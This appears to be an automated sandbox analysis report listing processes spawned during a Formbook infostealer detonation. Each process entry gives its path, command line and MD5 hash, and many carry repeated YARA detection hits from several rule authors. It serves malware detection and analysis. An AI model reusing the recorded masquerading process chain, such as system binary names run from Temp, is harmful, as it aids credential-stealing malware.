                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:30
                                                                                                                                                    Start time:09:57:57
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                                                                                                                                    Imagebase:0xdc0000
                                                                                                                                                    File size:45'984 bytes
                                                                                                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:31
                                                                                                                                                    Start time:09:57:58
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                                                                                                                                    Imagebase:0xe50000
                                                                                                                                                    File size:45'984 bytes
                                                                                                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:32
                                                                                                                                                    Start time:09:57:58
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmmon32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\cmmon32.exe"
                                                                                                                                                    Imagebase:0x790000
                                                                                                                                                    File size:36'352 bytes
                                                                                                                                                    MD5 hash:DEC326E5B4D23503EA5176878DDDB683
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:33
                                                                                                                                                    Start time:09:57:58
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmmon32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\cmmon32.exe"
                                                                                                                                                    Imagebase:0x790000
                                                                                                                                                    File size:36'352 bytes
                                                                                                                                                    MD5 hash:DEC326E5B4D23503EA5176878DDDB683
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:34
                                                                                                                                                    Start time:09:57:59
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC
                                                                                                                                                    Imagebase:0x290000
                                                                                                                                                    File size:947'288 bytes
                                                                                                                                                    MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:35
                                                                                                                                                    Start time:09:58:05
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                                                                                                                                    Imagebase:0xdc0000
                                                                                                                                                    File size:45'984 bytes
                                                                                                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:36
                                                                                                                                                    Start time:09:58:06
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                                                                                                                                    Imagebase:0xdb0000
                                                                                                                                                    File size:45'984 bytes
                                                                                                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:37
                                                                                                                                                    Start time:09:58:06
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\control.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\control.exe"
                                                                                                                                                    Imagebase:0x950000
                                                                                                                                                    File size:149'504 bytes
                                                                                                                                                    MD5 hash:EBC29AA32C57A54018089CFC9CACAFE8
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
